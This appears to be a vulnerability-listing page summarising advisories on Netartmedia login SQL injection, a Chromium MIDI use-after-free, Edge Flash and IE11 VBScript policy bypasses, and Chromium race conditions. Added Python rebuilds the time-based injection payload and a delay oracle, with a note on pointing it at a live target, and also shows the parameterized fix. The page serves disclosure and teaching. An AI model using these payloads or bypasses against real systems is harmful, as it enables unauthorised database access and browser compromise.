Explore Vulnerabilities

Explore all Exploits:

Netartmedia PHP Business Directory 4.2 – SQL Injection

Netartmedia PHP Business Directory 4.2 is vulnerable to a time-based blind SQL injection in the 'Email' parameter of the 'loginaction.php' page. The published request body is 'Email=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z&Password=g00dPa%24%24w0rD&lang=en&mod=login' (%2C is a URL-encoded comma). The injected expression XORs the result of if(now()=sysdate(), sleep(N), 0) into the string comparison; since now() and sysdate() normally agree, MySQL evaluates sleep(N) and the response is delayed by N seconds. With the listed sleep(0) there is no delay, so that request is the baseline measurement; raising the argument (sleep(5), for example) produces the measurable delay that confirms the injection.

Netartmedia Jobs Portal 6.1 – SQL Injection

Netartmedia Jobs Portal 6.1 is vulnerable to the same kind of SQL injection. An attacker exploits it by sending a specially crafted payload to the loginaction.php page as the email address POST parameter. The payload is designed to make the application pause for a chosen number of seconds, and the delayed response, rather than any returned data, indicates a successful injection.
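The following is an added example covering both Netartmedia entries above; it is not code from the advisories or from the product. It rebuilds the published request body, shows where the payload lands in a naively concatenated login query, runs a delay oracle against a simulated server, and contrasts a parameterized query that treats the same input as data. The query shape, the users table and the simulated server are assumptions made for illustration.

```python
"""Added example (not the advisory's code): rebuilds the published time-based
blind payload for the Netartmedia loginaction.php SQL injection, shows where
it lands in a naively concatenated login query, runs a delay oracle, and
contrasts a parameterized query that treats the same input as data.
The query shape and the simulated server are assumptions for illustration."""
import re
import sqlite3
from typing import Callable
from urllib.parse import quote

# Request body exactly as published for PHP Business Directory 4.2.
PUBLISHED_BODY = ("Email=0'XOR(if(now()=sysdate()%2Csleep(0)%2C0))XOR'Z"
                  "&Password=g00dPa%24%24w0rD&lang=en&mod=login")

# The published body only escapes ',' and '$'; quotes, parentheses and '='
# travel raw, which is what these safe characters reproduce.
SAFE_CHARS = "'()="


def time_based_payload(seconds: int) -> str:
    """MySQL time-based probe.  now()=sysdate() is normally true, so if()
    takes the sleep() branch; XOR-ing the integer result between two quoted
    fragments keeps the original query's quotes balanced."""
    return f"0'XOR(if(now()=sysdate(),sleep({seconds}),0))XOR'Z"


def build_login_body(email: str, password: str = "g00dPa$$w0rD",
                     lang: str = "en", mod: str = "login") -> str:
    """application/x-www-form-urlencoded body for loginaction.php."""
    fields = [("Email", email), ("Password", password), ("lang", lang), ("mod", mod)]
    return "&".join(f"{name}={quote(value, safe=SAFE_CHARS)}" for name, value in fields)


def spliced_query(email: str, password: str) -> str:
    """Assumed shape of the vulnerable query: values concatenated unescaped."""
    return f"SELECT id FROM users WHERE Email='{email}' AND Password='{password}'"


_SLEEP_RE = re.compile(r"sleep\((\d+)\)")


def simulated_send(body: str) -> float:
    """Constructed stand-in for the vulnerable server.  Returns the seconds a
    real request would take: 0.2 s of normal processing plus any sleep()."""
    match = _SLEEP_RE.search(body)
    return 0.2 + (int(match.group(1)) if match else 0)


def is_time_blind_injectable(send: Callable[[str], float],
                             delay: int = 5, margin: float = 0.8) -> bool:
    """Delay oracle: a sleep(0) baseline (sampled twice so one slow response
    does not mask the signal) against sleep(delay).  Injectable when the gap
    is at least margin * delay."""
    baseline = max(send(build_login_body(time_based_payload(0))) for _ in range(2))
    delayed = send(build_login_body(time_based_payload(delay)))
    return delayed - baseline >= margin * delay


def demo_db() -> sqlite3.Connection:
    """Constructed in-memory users table standing in for the real schema."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, Email TEXT, Password TEXT)")
    conn.execute("INSERT INTO users (Email, Password) VALUES ('admin@example.com', 'secret')")
    return conn


def parameterized_login(conn: sqlite3.Connection, email: str, password: str):
    """Hardened form: placeholders keep the payload a literal string, so the
    XOR/sleep text is compared against the Email column, never executed."""
    row = conn.execute("SELECT id FROM users WHERE Email=? AND Password=?",
                       (email, password)).fetchone()
    return row[0] if row else None


if __name__ == "__main__":
    print(spliced_query(time_based_payload(5), "g00dPa$$w0rD"))
    print("injectable:", is_time_blind_injectable(simulated_send))
    print("login with payload:", parameterized_login(demo_db(), time_based_payload(5), "x"))
```

Against a live target, replace simulated_send with a function that POSTs the body to loginaction.php and returns the elapsed time; the two-sample baseline and the 80% margin are there to keep ordinary network jitter from being read as a delay.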

MidiManagerWin Use-After-Free

MidiManagerWin uses an instance_id mechanism to ensure that delayed tasks are executed only if the MidiManager instance they were scheduled on is still alive: each task records the id of its instance and is skipped if that id no longer matches the live one. However, the instance_id is an int, and, unlike the Linux and Mac implementations (MidiManagerAlsa on Linux), nothing checks that it has not overflowed. If a delayed sendData is queued on a stale MidiManagerWin instance and the instance id is then wrapped around to the same value, the task passes the check and runs against the freed instance, a use-after-free. A proof of concept is available that reaches the wrap in a more convenient amount of time for testing.
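As an added illustration, and not Chromium's own code, here is a Python model of the instance_id guard described above. It shows how a wrapping 32-bit id lets a stale delayed task pass the liveness check and touch a destroyed instance, and how an overflow-checked counter that refuses to reissue ids closes that gap. All class and method names are assumptions; the jump of the counter back to INT32_MAX stands in for the 2**32 create/destroy cycles the real PoC shortcuts.

```python
"""Added example, not Chromium code: a Python model of the instance_id guard
described above.  It shows how a wrapping 32-bit id lets a stale delayed task
pass the liveness check and touch a destroyed instance, and how refusing to
wrap the counter closes that gap.  Class and method names are assumptions."""
from dataclasses import dataclass
from typing import List, Optional

INT32_MIN, INT32_MAX = -2**31, 2**31 - 1


def int32_increment(value: int) -> int:
    """Two's-complement wrap: what ++ on a C++ int does in practice."""
    return ((value + 1 - INT32_MIN) % 2**32) + INT32_MIN


def int32_increment_checked(value: int) -> int:
    """Overflow-checked counterpart: fail rather than reissue an id."""
    if value == INT32_MAX:
        raise OverflowError("instance_id space exhausted")
    return value + 1


class Instance:
    """Stands in for a MidiManagerWin object; alive=False is the freed state."""
    def __init__(self, instance_id: int) -> None:
        self.instance_id = instance_id
        self.alive = True

    def send_data(self, payload: bytes) -> str:
        if not self.alive:
            # The real bug dereferences freed memory here; the model raises.
            raise RuntimeError(f"use-after-free: sendData on destroyed instance {self.instance_id}")
        return f"sent {payload.hex()} via instance {self.instance_id}"


@dataclass
class DelayedTask:
    instance_id: int     # id captured when the task was scheduled
    instance: Instance   # the object the task will touch when it runs
    payload: bytes


class Runtime:
    """One current instance plus the queue of delayed sendData tasks."""
    def __init__(self, first_id: int = 0, checked: bool = False) -> None:
        self.next_id = first_id
        self.increment = int32_increment_checked if checked else int32_increment
        self.current: Optional[Instance] = None
        self.queue: List[DelayedTask] = []

    def create_instance(self) -> Instance:
        self.current = Instance(self.next_id)
        self.next_id = self.increment(self.next_id)
        return self.current

    def destroy_current(self) -> None:
        self.current.alive = False
        self.current = None

    def schedule_send(self, payload: bytes) -> None:
        self.queue.append(DelayedTask(self.current.instance_id, self.current, payload))

    def run_delayed(self) -> List[str]:
        """The guard from the report: run a task only if its recorded id equals
        the live instance's id.  Correct as long as ids are never reissued."""
        results = []
        for task in self.queue:
            if self.current is not None and task.instance_id == self.current.instance_id:
                results.append(task.instance.send_data(task.payload))
        self.queue.clear()
        return results


def guard_drops_stale_task() -> List[str]:
    """Without a wrap the guard works: the stale task is skipped."""
    rt = Runtime()
    rt.create_instance()
    rt.schedule_send(b"\x90\x3c\x7f")      # constructed MIDI note-on message
    rt.destroy_current()
    rt.create_instance()                   # gets a fresh, different id
    return rt.run_delayed()


def reproduce_wrap() -> str:
    """The report's scenario: task queued on a stale instance, counter wrapped
    back to the same id, task runs against freed memory."""
    rt = Runtime(first_id=INT32_MAX)
    rt.create_instance()
    rt.schedule_send(b"\x90\x3c\x7f")
    rt.destroy_current()
    # Stands in for the 2**32 create/destroy cycles that bring the int back
    # to INT32_MAX (the real PoC shortens this wait).
    rt.next_id = INT32_MAX
    rt.create_instance()                   # same id as the destroyed instance
    try:
        rt.run_delayed()
    except RuntimeError as err:
        return str(err)
    return "task was skipped"
```

The checked variant fails closed: once the counter would wrap, create_instance raises instead of handing out an id that a queued task may still hold, which is the behaviour the report attributes to the non-Windows implementations.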

Bypassing Flash Click2Play in Microsoft Edge

This PoC bypasses Flash click-to-play in Microsoft Edge. It was tested on Windows 10 64-bit version 1809 with the latest patches applied. The PoC currently loads a .swf from wwwimages.adobe.com, but it can load a .swf from any domain, and the PoC itself can be hosted on any domain. The vulnerability lies in the logic of CObjectElement::FinalCreateObject, which calls COleSite::CreateObject if clsid != CLSID_MacromediaSwFlash or if IsFlashCreateable() returns false, creating the object immediately without performing any additional checks.

Windows: IE11 VBScript execution policy bypass in MSHTML

MSHTML only checks for the CLSID associated with VBScript when blocking script in the Internet Zone, but it does not check the other VBScript CLSIDs, which lets a web page bypass the security zone policy. According to https://blogs.windows.com/msedgedev/2017/07/07/update-disabling-vbscript-internet-explorer-11/, starting from the Windows 10 Fall Creators Update, VBScript execution in IE 11 should be disabled by default for websites in the Internet Zone and the Restricted Sites Zone. The VBScript zone policy check is done in MSHTML!AllowVBScript, which is only called from MSHTML!CScriptCollection::GetHolderCLSID if the script language CLSID matches {b54f3741-5b07-11cf-a4b0-00aa004a55e8}. However, IE still supports the old VBScript.Encode language, which has the slightly different CLSID {b54f3743-5b07-11cf-a4b0-00aa004a55e8}. To bypass the VBScript zone policy it is therefore enough to change the language attribute in the HTML from "VBScript" to "VBScript.Encode". To add insult to injury, the script does not even need to be encoded: if the engine detects that the script is not encoded, it parses it as plain, unencoded VBScript.

Race Condition in Destruction of ExtensionsGuestViewMessageFilter

There appears to be a race condition in the destruction of ExtensionsGuestViewMessageFilter when ProcessIdToFilterMap is modified concurrently. The issue was detected by ThreadSanitizer (TSAN) during fuzzing, but it can also be reproduced by spawning a large number of renderers. The bug report will become visible to the public after 90 days elapse or a patch has been made broadly available (whichever is earlier).

Race Condition in Destruction of BindingState for Bindings to StoragePartitionService

There is a race condition in the destruction of the BindingState for bindings to the StoragePartitionService. It is caused by two concurrent calls to callbacks returned from mojo::BindingSet::GetBadMessageCallback() on the same BindingSet: one call is made in a synchronous context while validating a received message or while tearing down the connection, the other from the callback passed to OpenSessionStorage. The repro is not terribly reliable, but opening multiple tabs at once increases the chance of hitting the race to the point where it triggers in around 50% of attempts.
